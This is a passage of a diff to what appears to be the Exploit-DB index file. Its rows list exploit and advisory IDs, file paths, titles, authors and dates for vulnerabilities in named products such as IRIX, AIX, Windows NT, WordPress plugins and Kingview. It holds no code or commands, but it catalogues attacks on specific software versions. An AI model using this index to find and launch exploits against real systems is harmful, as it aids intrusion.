(2)",1997-04-26,BeastMaster,unix,local,0 19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,metasploit,windows,local,0 @@ -16540,18 +16577,20 @@ id,file,description,date,author,platform,type,port 19187,platforms/php/webapps/19187.txt,"Wordpress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection Vulnerability",2012-06-16,Vulnerability-Lab,php,webapps,0 19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 +19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19192,platforms/windows/local/19192.txt,"Hancom Office 2007 Reboot.ini Clear-Text Passwords Vulnerability",1999-02-09,"Russ Cooper",windows,local,0 19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 Getfile Vulnerability",1999-02-11,"Cameron Childress",multiple,remote,0 19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability",1999-02-11,"Gary Geisbert",multiple,remote,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability",1997-07-16,"Paul Ashton",windows,local,0 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability",1998-03-19,"Martin Dolphin",windows,local,0 -19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 - ""Pass the Hash"" with Modified SMB Client Vulnerability",1997-04-08,"Paul Ashton",windows,remote,0 +19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - ""Pass the Hash"" with Modified SMB Client Vulnerability",1997-04-08,"Paul Ashton",windows,remote,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris <= 2.5.1 automount Vulnerability",1997-11-26,anonymous,solaris,local,0 -19200,platforms/unix/local/19200.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1.0, FreeBSD FreeBSD 1.1.5.1/2.0 , HP HP-UX <= 10.34, IBM AIX <= 4.2, SGI IRIX <= 6.3, SunOS <= 4.1.4 - libXt library Vulnerability (1)",1997-08-25,bloodmask,unix,local,0 -19201,platforms/unix/local/19201.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1.0, FreeBSD FreeBSD 1.1.5.1/2.0 , HP HP-UX <= 10.34, IBM AIX <= 4.2, SGI IRIX <= 6.3, SunOS <= 4.1.4 - libXt library Vulnerability (2)",1997-08-25,jGgM,unix,local,0 -19202,platforms/unix/local/19202.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1.0, FreeBSD FreeBSD 1.1.5.1/2.0 , HP HP-UX <= 10.34, IBM AIX <= 4.2, SGI IRIX <= 6.3, SunOS <= 4.1.4 - libXt library Vulnerability (3)",1997-08-25,jGgM,unix,local,0 -19203,platforms/unix/local/19203.c,"BSD/OS <= 2.1,DG/UX <= 4.0,Debian Linux 0.93,Digital UNIX <= 4.0 B,FreeBSD <= 2.1.5,HP-UX <= 10.34,IBM AIX <= 4.1.5,NetBSD 1.0/1.1,NeXTstep <= 4.0, SGI IRIX <= 6.3,SunOS <= 4.1.4 rlogin Vulnerability",1996-12-04,"Roger Espel Llima",unix,local,0 +19200,platforms/unix/local/19200.c,"BSD/OS <= 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX <= 10.34 & IBM AIX <= 4.2 & SGI IRIX <= 6.3 & SunOS <= 4.1.4 - libXt library Vulnerability (1)",1997-08-25,bloodmask,unix,local,0 +19201,platforms/unix/local/19201.c,"BSD/OS <= 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX <= 10.34 & IBM AIX <= 4.2 & SGI IRIX <= 6.3 & SunOS <= 4.1.4 - libXt library Vulnerability (2)",1997-08-25,jGgM,unix,local,0 +19202,platforms/unix/local/19202.c,"BSD/OS <= 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX <= 10.34 & IBM AIX <= 4.2 & SGI IRIX <= 6.3 & SunOS <= 4.1.4 - libXt library Vulnerability (3)",1997-08-25,jGgM,unix,local,0 +19203,platforms/unix/local/19203.c,"BSD/OS <= 2.1_DG/UX <= 4.0_Debian Linux 0.93_Digital UNIX <= 4.0 B_FreeBSD <= 2.1.5_HP-UX <= 10.34_IBM AIX <= 4.1.5_NetBSD 1.0/1.1_NeXTstep <= 4.0_ SGI IRIX <= 6.3_SunOS <= 4.1.4 rlogin Vulnerability",1996-12-04,"Roger Espel Llima",unix,local,0 +19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 19205,platforms/solaris/local/19205.c,"Sun Solaris <= 7.0 dtprintinfo Buffer Overflow Vulnerability",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris <= 7.0 lpset Buffer Overflow Vulnerability",1999-05-11,"kim yong-jun",solaris,local,0 19207,platforms/windows/dos/19207.txt,"Microsoft Outlook Express 4.27.3110/4.72.3120 POP Denial of Service Vulnerability",1999-05-11,"Miquel van Smoorenburg",windows,dos,0 @@ -16560,11 +16599,11 @@ id,file,description,date,author,platform,type,port 19210,platforms/irix/local/19210.txt,"SGI IRIX <= 6.5.4 midikeys Root Vulnerability",1999-05-19,"W. Cashdollar",irix,local,0 19211,platforms/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability",1999-05-20,"David Litchfield",windows,local,0 19212,platforms/multiple/remote/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,remote,0 -19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 -19214,platforms/aix/local/19214.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (2)",1999-05-22,"Georgi Guninski",aix,local,0 -19215,platforms/aix/local/19215.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (3)",1999-05-22,UNYUN,aix,local,0 -19216,platforms/aix/local/19216.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 -19217,platforms/aix/local/19217.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (5)",1999-05-22,UNYUN,aix,local,0 +19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 +19214,platforms/aix/local/19214.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (2)",1999-05-22,"Georgi Guninski",aix,local,0 +19215,platforms/aix/local/19215.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (3)",1999-05-22,UNYUN,aix,local,0 +19216,platforms/aix/local/19216.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 +19217,platforms/aix/local/19217.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (5)",1999-05-22,UNYUN,aix,local,0 19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 - Buffer Overflow Vulnerabilities",1999-05-03,"Arne Vidstrom",linux,remote,0 19219,platforms/linux/remote/19219.c,"bisonware bisonware ftp server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server <= 4.0.1 CFCRYPT.EXE Vulnerability",1998-05-19,"Matt Chapman",windows,local,0 @@ -16572,10 +16611,10 @@ id,file,description,date,author,platform,type,port 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 19223,platforms/multiple/remote/19223.txt,"Floosietek FTGate 2.1 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 Web File Access Vulnerability",1999-05-25,Marc,windows,remote,0 -19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0,Insight Management Agents 4.21 A/4.22 A/4.30 A,Intelligent Cluster Administrator 1.0,Management Agents for Workstations 4.20 A,Server Management Agents <= 4.23,Survey Utility 2.0 Web File Access Vulnerability",1999-05-25,"Master Dogen",multiple,dos,0 +19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0_Insight Management Agents 4.21 A/4.22 A/4.30 A_Intelligent Cluster Administrator 1.0_Management Agents for Workstations 4.20 A_Server Management Agents <= 4.23_Survey Utility 2.0 Web File Access Vulnerability",1999-05-25,"Master Dogen",multiple,dos,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow Vulnerability",1999-05-26,"Chris Evans",linux,remote,0 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 Vulnerability",1999-05-10,"Thomas Krug",windows,local,0 -19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0,Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability",1999-05-25,"J. Abreu Junior",multiple,dos,0 +19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0_Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability",1999-05-25,"J. Abreu Junior",multiple,dos,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 19230,platforms/multiple/remote/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service Vulnerability",1999-05-11,"Chris Radigan",multiple,remote,0 19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,metasploit,windows,remote,0 @@ -16599,15 +16638,16 @@ id,file,description,date,author,platform,type,port 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 Vulnerability",1999-03-02,Arthur,linux,local,0 19250,platforms/linux/local/19250.txt,"Linux kernel 2.0/2.1/2.2 autofs Vulnerability",1999-02-19,"Brian Jones",linux,local,0 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 Protocol Four and Zero Header Length Vulnerability",1999-06-16,badi,linux,remote,0 +19401,platforms/windows/local/19401.txt,"quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd Vulnerability",1999-06-17,anonymous,linux,remote,0 19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 gnuplot Vulnerability",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 No Logging Vulnerability",1999-06-09,"Tani Hosokawa",linux,local,0 -19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3,Debian Linux <= 2.0 netstd Vulnerabilities",1999-01-03,anonymous,linux,local,0 +19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3_Debian Linux <= 2.0 netstd Vulnerabilities",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 Symlink Vulnerability",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris <= 7.0 ff.core Vulnerability",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc Vulnerabilty",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 /usr/lib/netaddpr Vulnerability",1997-05-09,"Jaechul Choe",irix,local,0 -19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2,SGI IRIX <= 6.5.1 at(1) Vulnerability",1998-06-27,Gutierrez,netbsd_x86,local,0 +19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) Vulnerability",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX <= 6.2 cdplayer Vulnerability",1996-11-21,"Yuri Volobuev",irix,local,0 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0 @@ -16624,7 +16664,7 @@ id,file,description,date,author,platform,type,port 19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 eject Vulnerability (1)",1997-05-25,DCRH,irix,local,0 19277,platforms/irix/local/19277.c,"SGI IRIX <= 6.2 eject Vulnerability (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 -19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX <= 10.20,IBM AIX <= 4.1.5 connect() Denial of Service Vulnerability",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 +19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX <= 10.20_IBM AIX <= 4.1.5 connect() Denial of Service Vulnerability",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console Vulnerability",1996-02-02,"David J Meltzer",linux,local,0 19280,platforms/irix/local/19280.txt,"SGI IRIX <= 6.2 fsdump Vulnerability",1996-12-03,"Jaechul Choe",irix,local,0 19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview Vulnerability",1999-05-28,"Chris Evans",linux,local,0 @@ -16642,6 +16682,8 @@ id,file,description,date,author,platform,type,port 19293,platforms/windows/local/19293.py,"Sysax <= 5.62 Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0 +19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 +19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack Vulnerability",1999-11-05,"Michal Zalewski",linux,local,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd Vulnerability",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap Vulnerability",1997-04-19,"J.A. Gutierrez",multiple,remote,0 19299,platforms/multiple/remote/19299.txt,"SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerabilty",1997-05-06,anonymous,multiple,remote,0 @@ -16656,21 +16698,25 @@ id,file,description,date,author,platform,type,port 19308,platforms/linux/local/19308.c,"Linux kernel 2.0/2.0.33 i_count Overflow Vulnerability",1998-01-14,"Aleph One",linux,local,0 19309,platforms/aix/local/19309.c,"IBM AIX <= 4.2 lchangelv Buffer Overflow Vulnerability",1997-07-21,"Bryan P. Self",aix,local,0 19310,platforms/irix/local/19310.c,"SGI IRIX <= 6.4 login Vulnerability",1997-05-26,"David Hedley",irix,local,0 -19311,platforms/linux/local/19311.c,"RedHat Linux 4.2,SGI IRIX <= 6.3,Solaris <= 2.6 mailx Vulnerability (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 -19312,platforms/linux/local/19312.c,"RedHat Linux 4.2,SGI IRIX <= 6.3,Solaris <= 2.6 mailx Vulnerability (2)",1998-06-25,segv,linux,local,0 +19311,platforms/linux/local/19311.c,"RedHat Linux 4.2_SGI IRIX <= 6.3_Solaris <= 2.6 mailx Vulnerability (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 +19312,platforms/linux/local/19312.c,"RedHat Linux 4.2_SGI IRIX <= 6.3_Solaris <= 2.6 mailx Vulnerability (2)",1998-06-25,segv,linux,local,0 19313,platforms/irix/local/19313.txt,"SGI IRIX <= 6.4 netprint Vulnerability",1997-01-04,"Yuri Volobuev",irix,local,0 -19314,platforms/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2, Slackware Linux <= 3.5 - klogd Buffer Overflow Vulnerability (1)",1999-02-26,"Michal Zalewski",linux,local,0 -19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2,Slackware Linux <= 3.5 klogd Buffer Overflow Vulnerability (2)",1999-02-26,"Esa Etelavuori",linux,local,0 +19314,platforms/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2_ Slackware Linux <= 3.5 - klogd Buffer Overflow Vulnerability (1)",1999-02-26,"Michal Zalewski",linux,local,0 +19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2_Slackware Linux <= 3.5 klogd Buffer Overflow Vulnerability (2)",1999-02-26,"Esa Etelavuori",linux,local,0 19316,platforms/irix/remote/19316.c,"SGI IRIX <= 6.5.2 nsd Vulnerability",1999-05-31,"Jefferson Ogata",irix,remote,0 19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 ordist Vulnerability",1997-05-24,"Yuri Volobuev",irix,local,0 19318,platforms/aix/local/19318.c,"SGI IRIX <= 6.4 permissions Buffer Overflow Vulnerability",1997-05-26,"David Hedley",aix,local,0 19319,platforms/irix/local/19319.c,"SGI IRIX 5.3 pkgadjust Vulnerability",1996-09-23,"Hui-Hui Hu",irix,local,0 +19411,platforms/bsd/local/19411.txt,"BSDI BSD/OS 4.0_FreeBSD 3.2_NetBSD 1.4 x86_OpenBSD 2.5 UFS Secure Level 1 Vulnerability",1999-07-02,Stealth,bsd,local,0 +19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 Registry Vulnerability",1999-02-22,Chris,windows,local,0 +19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow DoS Vulnerability",1999-02-22,Prizm,windows,dos,0 +19406,platforms/linux/webapps/19406.txt,"symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps,0 19321,platforms/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler Multiple Vulnerabilities",2012-06-21,LiquidWorm,windows,webapps,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow",2012-06-21,Rh0,windows,remote,0 +19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs Vulnerability",1999-03-09,"Toomas Soome",solaris,local,0 19323,platforms/windows/local/19323.c,"URL Hunter Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 19324,platforms/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 19325,platforms/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps,0 -19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs Vulnerability",1999-03-09,"Toomas Soome",solaris,local,0 19327,platforms/solaris/remote/19327.c,"Sun Solaris <= 2.5.1 rpc.statd rpc Call Relaying Vulnerability",1999-06-07,anonymous,solaris,remote,0 19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 Heap Overflow DoS/Crash Proof of Concept",2012-06-22,"Debasish Mandal",windows,dos,0 19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 @@ -16690,25 +16736,27 @@ id,file,description,date,author,platform,type,port 19343,platforms/solaris/local/19343.c,"Solaris <= 2.5.1 rsh socket descriptor Vulnerability",1997-06-19,"Alan Cox",solaris,local,0 19344,platforms/aix/local/19344.sh,"IBM AIX <= 3.2.5 IFS Vulnerability",1994-04-02,anonymous,aix,local,0 19345,platforms/aix/local/19345.txt,"IBM AIX <= 4.2.1 lquerypv Vulnerability",1996-11-24,Aleph1,aix,local,0 -19346,platforms/freebsd/local/19346.c,"FreeBSD <= 3.1,Solaris <= 2.6 Domain Socket Vulnerability",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 +19346,platforms/freebsd/local/19346.c,"FreeBSD <= 3.1_Solaris <= 2.6 Domain Socket Vulnerability",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 19347,platforms/irix/local/19347.c,"SGI IRIX <= 6.3 pset Vulnerability",1997-07-17,"Last Stage of Delirium",irix,local,0 19348,platforms/aix/remote/19348.txt,"IBM AIX <= 3.2.5 login(1) Vulnerability",1996-12-04,anonymous,aix,remote,0 19349,platforms/irix/local/19349.txt,"SGI IRIX <= 6.4 rmail Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris <= 2.5.1 License Manager Vulnerability",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports Vulnerability",1994-02-02,transit,irix,local,0 +19407,platforms/windows/remote/19407.py,"Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 19353,platforms/irix/local/19353.txt,"SGI IRIX <= 6.4 suid_exec Vulnerability",1996-12-02,"Yuri Volobuev",irix,local,0 19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp Vulnerability",1996-12-02,anonymous,aix,local,0 19355,platforms/irix/local/19355.txt,"SGI IRIX <= 6.4 startmidi Vulnerabilty",1997-02-09,"David Hedley",irix,local,0 19356,platforms/irix/local/19356.txt,"SGI IRIX <= 6.3 Systour and OutOfBox Vulnerabilities",1996-10-30,"Tun-Hui Hu",irix,local,0 19357,platforms/irix/dos/19357.sh,"SGI IRIX 6.2 SpaceWare Vulnerability",1996-10-30,"J.A. Guitierrez",irix,dos,0 19358,platforms/irix/local/19358.txt,"SGI IRIX <= 6.4 xfsdump Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 -19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 -19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4,RedHat Linux 4.0 vsyslog() Buffer Overflow Vulnerability",1997-12-21,"Solar Designer",linux,local,0 +19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4_Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 +19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4_RedHat Linux 4.0 vsyslog() Buffer Overflow Vulnerability",1997-12-21,"Solar Designer",linux,local,0 19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 Double Byte Code Page Vulnerability",1999-06-24,Microsoft,windows,remote,0 19362,platforms/sco/local/19362.c,"SCO Open Server <= 5.0.5 XBase Buffer Overflow Vulnerabilities",1999-06-14,doble,sco,local,0 -19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 +19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0 +19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0 @@ -16716,54 +16764,37 @@ id,file,description,date,author,platform,type,port 19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability",1999-06-28,"J D Glaser",windows,dos,0 19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow Vulnerability (1)",1999-02-17,c0nd0r,linux,local,0 19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow Vulnerability (2)",1999-02-17,Zhodiac,linux,local,0 +19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal Vulnerability",1999-02-22,eEYe,multiple,remote,0 +19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0 19377,platforms/multiple/dos/19377.txt,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 19378,platforms/multiple/dos/19378.txt,"Ipswitch IMail 5.0 LDAP Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 19379,platforms/multiple/dos/19379.txt,"Ipswitch IMail 5.0 IMonitor Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 19380,platforms/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 Web Service Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 -19381,platforms/php/webapps/19381.php,"SugarCRM CE <= 6.3.1 - ""unserialize()"" PHP Code Execution",2012-06-23,EgiX,php,webapps,0 -19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 -19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal Vulnerability",1999-02-22,eEYe,multiple,remote,0 -19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0 -19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 -19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0 -19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,metasploit,windows,remote,0 -19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 -19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 -19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 